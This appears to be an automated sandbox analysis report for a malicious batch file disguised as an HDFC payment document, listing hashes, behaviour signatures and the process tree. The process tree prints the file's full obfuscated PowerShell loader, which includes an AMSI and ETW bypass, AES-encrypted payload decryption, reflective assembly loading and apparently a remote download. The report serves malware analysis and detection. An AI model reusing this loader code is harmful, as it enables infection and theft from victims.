2394ebe357987c3177feda5060b31c7c489755e9046409af83cfd8a66aa1f2e4

General

Target

HDFC PAYMENT.bat
Size

413KB
MD5

b40af4f36e64a53783d8c3dde233dc1a
SHA1

71a43ec06c566ea2fdbf898104a4c3c02b87bb72
SHA256

d6a5365c045330e093f36f11597e7a49924a52b3f19cbea45d37f1f1fcc2ffa7
SHA512

aa59ea51074b40df9bc183eae7d40e065e0d0e370ccf530dc86f0d6da621e6d857b306c1fd4a9ade7787ebed26cb1f012564a235b8597e04a83a95a531f7cfb3
SSDEEP

6144:+7xGCfsp8mrunqNHsO+AyLT+9lAx1nZJoEU/ghKWv9yEZIYe7uAtYJ5bNrJ8Wpwy:g0amrgUH6NvvZvUY8+9ytiAtqpOWpLf

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2744	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2744	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2804 wrote to memory of 2892	2804	cmd.exe	31
PID 2804 wrote to memory of 2892	2804	cmd.exe	31
PID 2804 wrote to memory of 2892	2804	cmd.exe	31
PID 2892 wrote to memory of 2740	2892	cmd.exe	33
PID 2892 wrote to memory of 2740	2892	cmd.exe	33
PID 2892 wrote to memory of 2740	2892	cmd.exe	33
PID 2892 wrote to memory of 2744	2892	cmd.exe	34
PID 2892 wrote to memory of 2744	2892	cmd.exe	34
PID 2892 wrote to memory of 2744	2892	cmd.exe	34

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\HDFC PAYMENT.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\HDFC PAYMENT.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\HDFC PAYMENT.bat';iex ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("cG93ZXJzaGVsbCAtdyBoaWRkZW47aWV4ICgoJChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnVTFSU1NVNUhVa0ZPUkU5TmFWTlVVa2xPUjFKQlRrUlBUV1ZUVkZKSlRrZFNRVTVFVDAxNElDZ29hVk5VVWtsT1IxSkJUa1JQVFhkVFZGSkpUa2RTUVU1RVQwMXlVMVJTU1U1SFVrRk9SRTlOSUMxVFZGSkpUa2RTUVU1RVQwMVZVMVJTU1U1SFVrRk9SRTlOYzFOVVVrbE9SMUpCVGtSUFRXVlRWRkpKVGtkU1FVNUVUMDFDVTFSU1NVNUhVa0ZPUkU5TllWTlVVa2xPUjFKQlRrUlBUWE5UVkZKSlRrZFNRVTVFVDAxcFUxUlNTVTVIVWtGT1JFOU5ZMU5VVWtsT1IxSkJUa1JQVFZCVFZGSkpUa2RTUVU1RVQwMWhVMVJTU1U1SFVrRk9SRTlOY2xOVVVrbE9SMUpCVGtSUFRYTlRWRkpKVGtkU1FVNUVUMDFwVTFSU1NVNUhVa0ZPUkU5TmJsTlVVa2xPUjFKQlRrUlBUV2RUVkZKSlRrZFNRVTVFVDAwZ0lsTlVVa2xPUjFKQlRrUlBUV2hUVkZKSlRrZFNRVTVFVDAxMGRIQnpVMVJTU1U1SFVrRk9SRTlOT2xOVVVrbE9SMUpCVGtSUFRTOVRWRkpKVGtkU1FVNUVUMDB2VTFSU1NVNUhVa0ZPUkU5Tk1GTlVVa2xPUjFKQlRrUlBUWGhUVkZKSlRrZFNRVTVFVDAwd1UxUlNTVTVIVWtGT1JFOU5MbE5VVWtsT1IxSkJUa1JQVFhOVFZGSkpUa2RTUVU1RVQwMTBVMVJTU1U1SFVrRk9SRTlOTDFOVVVrbE9SMUpCVGtSUFRUaFRWRkpKVGtkU1FVNUVUMDFhVTFSU1NVNUhVa0ZPUkU5TlJGTlVVa2xPUjFKQlRrUlBUV0ZUVkZKSlRrZFNRVTVFVDAwdVUxUlNTVTVIVWtGT1JFOU5kRk5VVWtsT1IxSkJUa1JQVFhoVFZGSkpUa2RTUVU1RVQwMTBVMVJTU1U1SFVrRk9SRTlOSWlrdVEyOXVkR1Z1ZEM1U1pYQnNZV05sS0NkQlFrTW5MQ2NuS1NrZ0xVVnljbTl5UVdOMGFXOXVJRk5wYkdWdWRHeDVRMjl1ZEdsdWRXVTcnKSkpKSAtcmVwbGFjZSAnU1RSSU5HUkFORE9NJywgJycpO3RyeXsgSW52b2tlLVN5c3RlbUFtc2lCeXBhc3MgLURpc2FibGVFVFcgLUVycm9yQWN0aW9uIFN0b3AgfWNhdGNoeyBXcml0ZS1PdXRwdXQgIlRoaXMgc3lzdGVtIGhhcyBhIG1vZGlmaWVkIEFNU0kiIH07ZnVuY3Rpb24gRFpXT00oJHBhcmFtX3Zhcil7JGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOyRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzskYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnRG1mMkdLcjRRanVwMDAxS08rblF6UW1xMzM1azJLdFh5Mkg5UE1GbnlzZz0nKTskYWVzX3Zhci5JVj1bU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCd3emN1VzhYUFVIZzBKcktHMXIzTzZRPT0nKTskSVVSSFo9JGFlc192YXIuQ3JlYXRlRGVjcnlwdG9yKCk7JExKWlRFPSRJVVJIWi5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsMCwkcGFyYW1fdmFyLkxlbmd0aCk7JElVUkhaLkRpc3Bvc2UoKTskYWVzX3Zhci5EaXNwb3NlKCk7JExKWlRFO31mdW5jdGlvbiBkZWNvbXByZXNzX2Z1bmN0aW9uKCRwYXJhbV92YXIpeyRMWEpUQz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOyRWVlBMVj1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JFJHRk9VPU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJExYSlRDLFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskUkdGT1UuQ29weVRvKCRWVlBMVik7JFJHRk9VLkRpc3Bvc2UoKTskTFhKVEMuRGlzcG9zZSgpOyRWVlBMVi5EaXNwb3NlKCk7JFZWUExWLlRvQXJyYXkoKTt9JFVFSkdUPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskcGF5bG9hZDJfdmFyPWRlY29tcHJlc3NfZnVuY3Rpb24gKERaV09NIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJFVFSkdULCA2KS5TdWJzdHJpbmcoMikpKSk7W1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRwYXlsb2FkMl92YXIpLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtjbGVhcjs="))) "
    3⤵
    PID:2740
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2744

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2744-4-0x000007FEF6A8E000-0x000007FEF6A8F000-memory.dmp

Filesize
4KB

Download
memory/2744-5-0x000000001B590000-0x000000001B872000-memory.dmp

Filesize
2.9MB

Download
memory/2744-6-0x000007FEF67D0000-0x000007FEF716D000-memory.dmp

Filesize
9.6MB

Download
memory/2744-7-0x000007FEF67D0000-0x000007FEF716D000-memory.dmp

Filesize
9.6MB

Download
memory/2744-8-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2744-9-0x000007FEF67D0000-0x000007FEF716D000-memory.dmp

Filesize
9.6MB

Download
memory/2744-10-0x000007FEF6A8E000-0x000007FEF6A8F000-memory.dmp

Filesize
4KB

Download
memory/2744-11-0x000007FEF67D0000-0x000007FEF716D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads